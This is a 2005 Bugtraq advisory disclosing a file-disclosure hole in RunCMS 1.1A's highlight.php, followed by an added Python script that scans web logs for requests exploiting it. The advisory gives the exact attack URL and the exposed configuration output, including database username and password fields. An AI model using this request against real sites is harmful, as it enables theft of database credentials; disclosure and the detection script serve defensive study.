Message-ID: <E1DCJCd-000FiC-VO@hossein.emami.bistgani>
Date: Fri, 18 Mar 2005 10:15:55 -0500
From: "Majid NT" <NT@...team.com>
To: bugtraq@...urityfocus.com
Subject: runcms highlight.php hole
********************************************
IHS Iran Hackers Sabotage Public advisory
by : NT NT@...team.com
********************************************
If You Have RUNCMS Installation Address You Can Use highlight.php Hole
And Get DataBase Configuration (Name, User, Password)
Tested In RUNCMS 1.1A
-------------------------------------------
Input This Line To Your Browser AddressBar :
http://targetsite/runcmsinstalation/class/debug/highlight.php?file=runcmsinstallationpath\mainfile.php&line=151#151
Like This :
http://localhost/runcms/class/debug/highlight.php?file=c:\phpdev\www\runcms\mainfile.php&line=151#151
You See This Result :
1 <?php
2 // ------------------------------------------------------------------------- //
3 // E-Xoops: Content Management for the Masses //
4 // < http://www.e-xoops.com > //
5 // ------------------------------------------------------------------------- //
6
7 if ( !defined('XOOPS_MAINFILE_INCLUDED') ) {
8 define('XOOPS_MAINFILE_INCLUDED', 1);
9
10 // Physical Path
11 // Physical path to your main RUNCMS directory WITHOUT trailing slash. ( On windows use simple forward slashes & be sure to include the drive letter. c:/myfolder )
12 define('XOOPS_ROOT_PATH', 'c:/phpdev/www/runcms1.1');
13
14 // Virtual Path (URL)
15 // Virtual path to your main RUNCMS directory WITHOUT trailing slash. ( http://www.mysite.com/myfolder )
16 define('XOOPS_URL', 'http://localhost/runcms1.1');
17
18 // Database
19 // Choose the type of database to be used.
20 $xoopsConfig['database'] = 'mysql';
21
22 // Table Prefix
23 // This prefix will be added to all new tables created to avoid name conflict in the database. If you are unsure, just use the default 'runcms'.
24 $xoopsConfig['prefix'] = 'runcms';
25
26 // Database Hostname
27 // Hostname of the database server. ( If you are unsure, 'localhost' works in most cases. )
28 $xoopsConfig['dbhost'] = 'localhost';
29
30 // Database Username
31 // Your database user account on the host. ( Often root when installed on your local machine. )
32 $xoopsConfig['dbuname'] = 'root';
33
34 // Database Password
35 // Password for your database user account.
36 $xoopsConfig['dbpass'] = '';
37
38 // Database Name
39 // The name of database on the host. The installer will attempt to create the database if not exist.
40 $xoopsConfig['dbname'] = 'aaa';
41
42 // Use persistent connection? (Yes=1 No=0)
43 // Default is 'No'. Choose 'No' if you are unsure.
44 $xoopsConfig['db_pconnect'] = 0;
45
46 // Default setup language.
47 $xoopsConfig['default_language'] = 'english';
48
49 include_once(XOOPS_ROOT_PATH.'/include/common.php');
50 }
?>
------------------------------------------
More Information See:
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=12
Source Advisory :
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=14
Found By NT(IHS)
NT@...Team.com
Greet To Lord And C0d3r From IHS.
www.IHSTeam.com
--
www.IHSTEAM.com
www.IHSSECURITY.com
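
A log check for the request pattern described in this advisory, as an added example that is not part of the original post: it scans web-server access logs for requests that pass a file parameter to class/debug/highlight.php and marks those that named mainfile.php and were answered with 200. The combined log format, the function name scan and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed input: Apache/Nginx "combined" access log lines.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SCRIPT_SUFFIX = "/class/debug/highlight.php"  # script path named in the advisory

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Mar/2005:10:20:01 -0500] "GET /runcms/class/debug/highlight.php'
    '?file=c%3A%5Cphpdev%5Cwww%5Cruncms%5Cmainfile.php&line=151 HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.4 - - [18/Mar/2005:10:21:10 -0500] "GET /runcms/index.php HTTP/1.1" 200 8042 "-" "-"',
    '203.0.113.9 - - [18/Mar/2005:10:22:45 -0500] "GET /runcms/class/debug/Highlight.php'
    '?line=3&file=/var/www/runcms/modules/news/index.php HTTP/1.1" 404 310 "-" "-"',
]


def scan(lines):
    """Return one finding per request that passes file= to highlight.php."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        # Decode percent-encoding and normalise case and slashes before matching.
        path = re.sub(r"/+", "/", unquote(url.path).replace("\\", "/").lower())
        if not path.endswith(SCRIPT_SUFFIX):
            continue
        files = parse_qs(url.query).get("file")  # parse_qs also percent-decodes
        if not files:
            continue
        requested = files[0]
        findings.append({
            "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
            "file": requested,
            # mainfile.php holds the database settings shown in the advisory.
            "config_read": requested.replace("\\", "/").lower().endswith("mainfile.php"),
            # A 200 means the script answered; treat the DB credentials as exposed.
            "served": m["status"] == "200",
        })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The #151 fragment from the advisory's URL never reaches the server, so it does not appear in access logs and is not part of the match.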